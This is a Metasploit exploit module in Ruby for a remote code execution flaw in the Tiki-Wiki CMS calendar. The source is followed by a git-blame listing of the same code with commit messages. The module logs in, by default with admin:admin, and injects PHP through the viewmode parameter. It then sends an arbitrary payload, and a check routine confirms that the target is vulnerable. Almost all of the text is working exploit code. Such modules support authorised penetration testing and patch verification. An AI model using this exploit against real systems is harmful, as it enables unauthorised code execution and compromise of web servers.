metasploit-framework/modules/exploits/linux/http/tiki_calendar_exec.rb

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name'        => 'Tiki-Wiki CMS Calendar Command Execution',
        'Description' => %q(
          Tiki-Wiki CMS's calendar module contains a remote code execution
          vulnerability within the viewmode GET parameter.
          The calendar module is NOT enabled by default.  If enabled,
          the default permissions are set to NOT allow anonymous users
          to access.

          Vulnerable versions: <=14.1, <=12.4 LTS, <=9.10 LTS and <=6.14
          Verified/Tested against 14.1
        ),
        'Author'      =>
          [
            'h00die <mike@shorebreaksecurity.com>', # module
            'Dany Ouellet'                          # discovery
          ],
        'References'  =>
          [
            [ 'EDB', '39965' ],
            [ 'URL', 'https://tiki.org/article414-Important-Security-Fix-for-all-versions-of-Tiki']
          ],
        'License'        => MSF_LICENSE,
        'Platform'       => %w( php ),
        'Privileged'     => false,
        'Arch'           => ARCH_PHP,
        'Targets'        =>
          [
            [ 'Automatic Target', {}]
          ],
        'DefaultTarget' => 0,
        'DisclosureDate' => 'Jun 06 2016'
      )
    )

    register_options(
      [
        Opt::RPORT(80),
        OptString.new('TARGETURI', [ true, 'The URI of Tiki-Wiki', '/']),
        OptString.new('USERNAME',  [ true, 'Username of a user with calendar access', 'admin']),
        OptString.new('PASSWORD',  [ true, 'Password of a user with calendar access', 'admin'])
      ], self.class
    )
  end

  # returns cookie regardless of outcome
  def authenticate
    begin
      # get a cookie to start with
      res = send_request_cgi(
        'uri'       => normalize_uri(target_uri.path, 'tiki-login_scr.php'),
        'method'    => 'GET'
      )

      if res && res.code == 404
        fail_with(Failure::Unknown, 'Target does not have tiki-login_scr.php')
      end

      cookie = res ? res.get_cookies : ''
      # if we have creds, login with them
      vprint_status('Attempting Login')
      # the bang on the cgi will follow the redirect we receive on a good login
      res = send_request_cgi!(
        'uri'       => normalize_uri(target_uri.path, 'tiki-login.php'),
        'method'    => 'POST',
        'ctype'     => 'application/x-www-form-urlencoded',
        'cookie'    => cookie,
        'vars_post' =>
          {
            'user'                     => datastore['USERNAME'],
            'pass'                     => datastore['PASSWORD'],
            'login'                    => '',
            'stay_in_ssl_mode_present' => 'y',
            'stay_in_ssl_mode'         => 'n'
          }
      )
      # double check auth worked and we got a Log out on the page.
      # at times I got it to auth, but then it would give permission errors
      # so we want to try to double check everything is good
      if res && res.body !~ /Log out/
        fail_with(Failure::UnexpectedReply, "#{peer} Login Failed with #{datastore['USERNAME']}:#{datastore['PASSWORD']}")
      end
      vprint_good("Login Successful")
      return cookie
    rescue ::Rex::ConnectionError
      fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
    end
  end

  # sends the calendar packet, returns the HTTP response
  def send_calendar_packet(cookie, data)
    begin
      return send_request_cgi(
        'uri'       => normalize_uri(target_uri.path, 'tiki-calendar.php'),
        'method'    => 'GET',
        'cookie'    => cookie,
        'vars_get'  =>
        {
          'viewmode'   => "';#{data};$a='"
        }
      )
    rescue ::Rex::ConnectionError
      fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
    end
  end

  # Version numbers are post auth, so we send a print statement w/
  # 10 random characters and check for it in the response
  def check
    if datastore['USERNAME'] && !datastore['USERNAME'].blank?
      cookie = authenticate
    end

    flag = Rex::Text.rand_text_alpha(10)
    res = send_calendar_packet(cookie, "print(#{flag})")

    if res
      if res.body =~ /You do not have permission to view the calendar/i
        fail_with(Failure::NoAccess, "#{peer} - Additional Permissions Required")
      elsif res.body =~ />#{flag}</
        Exploit::CheckCode::Vulnerable
      else
        Exploit::CheckCode::Safe
      end
    end
  end

  def exploit
    if datastore['USERNAME'] && !datastore['USERNAME'].blank?
      cookie = authenticate
    end

    vprint_status('Sending malicious calendar view packet')
    res = send_calendar_packet(cookie, payload.encoded)
    if res && res.body =~ /You do not have permission to view the calendar/i
      fail_with(Failure::NoAccess, "#{peer} - Additional Permissions Required")
    end
  end
end
tiki calendar 2016-06-18 17:11:11 +00:00			`##`
use https for metaploit.com links 2017-07-24 13:26:21 +00:00			`# This module requires Metasploit: https://metasploit.com/download`
OCD - Banner clean up 2017-07-14 07:19:50 +00:00			`# Current source: https://github.com/rapid7/metasploit-framework`
			`##`
tiki calendar 2016-06-18 17:11:11 +00:00
			`class MetasploitModule < Msf::Exploit::Remote`
			`Rank = ExcellentRanking`
Update tiki_calendar_exec module and documentation 2016-06-22 16:17:45 +00:00
			`include Msf::Exploit::Remote::HttpClient`

tiki calendar 2016-06-18 17:11:11 +00:00			`def initialize(info = {})`
			`super(`
			`update_info(`
			`info,`
			`'Name' => 'Tiki-Wiki CMS Calendar Command Execution',`
			`'Description' => %q(`
2 void-in fixes of 3 2016-06-19 18:35:27 +00:00			`Tiki-Wiki CMS's calendar module contains a remote code execution`
tiki calendar 2016-06-18 17:11:11 +00:00			`vulnerability within the viewmode GET parameter.`
Update tiki_calendar_exec module and documentation 2016-06-22 16:17:45 +00:00			`The calendar module is NOT enabled by default. If enabled,`
tiki calendar 2016-06-18 17:11:11 +00:00			`the default permissions are set to NOT allow anonymous users`
			`to access.`
Update tiki_calendar_exec module and documentation 2016-06-22 16:17:45 +00:00
updated check and docs that 14.2 may not be vuln 2016-06-21 20:48:09 +00:00			`Vulnerable versions: <=14.1, <=12.4 LTS, <=9.10 LTS and <=6.14`
tiki calendar 2016-06-18 17:11:11 +00:00			`Verified/Tested against 14.1`
			`),`
			`'Author' =>`
			`[`
			`'h00die <mike@shorebreaksecurity.com>', # module`
			`'Dany Ouellet' # discovery`
			`],`
			`'References' =>`
			`[`
			`[ 'EDB', '39965' ],`
			`[ 'URL', 'https://tiki.org/article414-Important-Security-Fix-for-all-versions-of-Tiki']`
			`],`
			`'License' => MSF_LICENSE,`
			`'Platform' => %w( php ),`
			`'Privileged' => false,`
			`'Arch' => ARCH_PHP,`
			`'Targets' =>`
			`[`
			`[ 'Automatic Target', {}]`
			`],`
			`'DefaultTarget' => 0,`
			`'DisclosureDate' => 'Jun 06 2016'`
			`)`
			`)`

			`register_options(`
			`[`
			`Opt::RPORT(80),`
			`OptString.new('TARGETURI', [ true, 'The URI of Tiki-Wiki', '/']),`
Fix #7158, tiki_calendar_exec incorrectly reports successful login Fix #7158 2016-07-28 22:03:31 +00:00			`OptString.new('USERNAME', [ true, 'Username of a user with calendar access', 'admin']),`
			`OptString.new('PASSWORD', [ true, 'Password of a user with calendar access', 'admin'])`
tiki calendar 2016-06-18 17:11:11 +00:00			`], self.class`
			`)`
			`end`

			`# returns cookie regardless of outcome`
			`def authenticate`
			`begin`
			`# get a cookie to start with`
			`res = send_request_cgi(`
			`'uri' => normalize_uri(target_uri.path, 'tiki-login_scr.php'),`
			`'method' => 'GET'`
			`)`
Fix #7158, tiki_calendar_exec incorrectly reports successful login Fix #7158 2016-07-28 22:03:31 +00:00
			`if res && res.code == 404`
			`fail_with(Failure::Unknown, 'Target does not have tiki-login_scr.php')`
			`end`

2 void-in fixes of 3 2016-06-19 18:35:27 +00:00			`cookie = res ? res.get_cookies : ''`
tiki calendar 2016-06-18 17:11:11 +00:00			`# if we have creds, login with them`
			`vprint_status('Attempting Login')`
follow redirect automatically 2016-06-20 00:24:54 +00:00			`# the bang on the cgi will follow the redirect we receive on a good login`
			`res = send_request_cgi!(`
tiki calendar 2016-06-18 17:11:11 +00:00			`'uri' => normalize_uri(target_uri.path, 'tiki-login.php'),`
			`'method' => 'POST',`
			`'ctype' => 'application/x-www-form-urlencoded',`
			`'cookie' => cookie,`
			`'vars_post' =>`
			`{`
			`'user' => datastore['USERNAME'],`
			`'pass' => datastore['PASSWORD'],`
			`'login' => '',`
			`'stay_in_ssl_mode_present' => 'y',`
			`'stay_in_ssl_mode' => 'n'`
			`}`
			`)`
follow redirect automatically 2016-06-20 00:24:54 +00:00			`# double check auth worked and we got a Log out on the page.`
			`# at times I got it to auth, but then it would give permission errors`
			`# so we want to try to double check everything is good`
Fix #7158, tiki_calendar_exec incorrectly reports successful login Fix #7158 2016-07-28 22:03:31 +00:00			`if res && res.body !~ /Log out/`
tiki calendar 2016-06-18 17:11:11 +00:00			`fail_with(Failure::UnexpectedReply, "#{peer} Login Failed with #{datastore['USERNAME']}:#{datastore['PASSWORD']}")`
			`end`
OCD - print_good & print_error 2017-07-19 11:48:52 +00:00			`vprint_good("Login Successful")`
tiki calendar 2016-06-18 17:11:11 +00:00			`return cookie`
			`rescue ::Rex::ConnectionError`
			`fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")`
			`end`
			`end`

functionalized calendar call, updated docs 2016-06-19 12:53:22 +00:00			`# sends the calendar packet, returns the HTTP response`
			`def send_calendar_packet(cookie, data)`
tiki calendar 2016-06-18 17:11:11 +00:00			`begin`
functionalized calendar call, updated docs 2016-06-19 12:53:22 +00:00			`return send_request_cgi(`
tiki calendar 2016-06-18 17:11:11 +00:00			`'uri' => normalize_uri(target_uri.path, 'tiki-calendar.php'),`
			`'method' => 'GET',`
			`'cookie' => cookie,`
			`'vars_get' =>`
			`{`
functionalized calendar call, updated docs 2016-06-19 12:53:22 +00:00			`'viewmode' => "';#{data};$a='"`
tiki calendar 2016-06-18 17:11:11 +00:00			`}`
			`)`
			`rescue ::Rex::ConnectionError`
			`fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")`
			`end`
			`end`

functionalized calendar call, updated docs 2016-06-19 12:53:22 +00:00			`# Version numbers are post auth, so we send a print statement w/`
			`# 10 random characters and check for it in the response`
			`def check`
			`if datastore['USERNAME'] && !datastore['USERNAME'].blank?`
			`cookie = authenticate`
			`end`
Update tiki_calendar_exec module and documentation 2016-06-22 16:17:45 +00:00
functionalized calendar call, updated docs 2016-06-19 12:53:22 +00:00			`flag = Rex::Text.rand_text_alpha(10)`
			`res = send_calendar_packet(cookie, "print(#{flag})")`
Update tiki_calendar_exec module and documentation 2016-06-22 16:17:45 +00:00
functionalized calendar call, updated docs 2016-06-19 12:53:22 +00:00			`if res`
Update tiki_calendar_exec module and documentation 2016-06-22 16:17:45 +00:00			`if res.body =~ /You do not have permission to view the calendar/i`
tiki calendar 2016-06-18 17:11:11 +00:00			`fail_with(Failure::NoAccess, "#{peer} - Additional Permissions Required")`
updated check and docs that 14.2 may not be vuln 2016-06-21 20:48:09 +00:00			`elsif res.body =~ />#{flag}</`
functionalized calendar call, updated docs 2016-06-19 12:53:22 +00:00			`Exploit::CheckCode::Vulnerable`
			`else`
			`Exploit::CheckCode::Safe`
tiki calendar 2016-06-18 17:11:11 +00:00			`end`
functionalized calendar call, updated docs 2016-06-19 12:53:22 +00:00			`end`
			`end`

			`def exploit`
			`if datastore['USERNAME'] && !datastore['USERNAME'].blank?`
			`cookie = authenticate`
			`end`
Update tiki_calendar_exec module and documentation 2016-06-22 16:17:45 +00:00
functionalized calendar call, updated docs 2016-06-19 12:53:22 +00:00			`vprint_status('Sending malicious calendar view packet')`
			`res = send_calendar_packet(cookie, payload.encoded)`
Update tiki_calendar_exec module and documentation 2016-06-22 16:17:45 +00:00			`if res && res.body =~ /You do not have permission to view the calendar/i`
functionalized calendar call, updated docs 2016-06-19 12:53:22 +00:00			`fail_with(Failure::NoAccess, "#{peer} - Additional Permissions Required")`
tiki calendar 2016-06-18 17:11:11 +00:00			`end`
			`end`
			`end`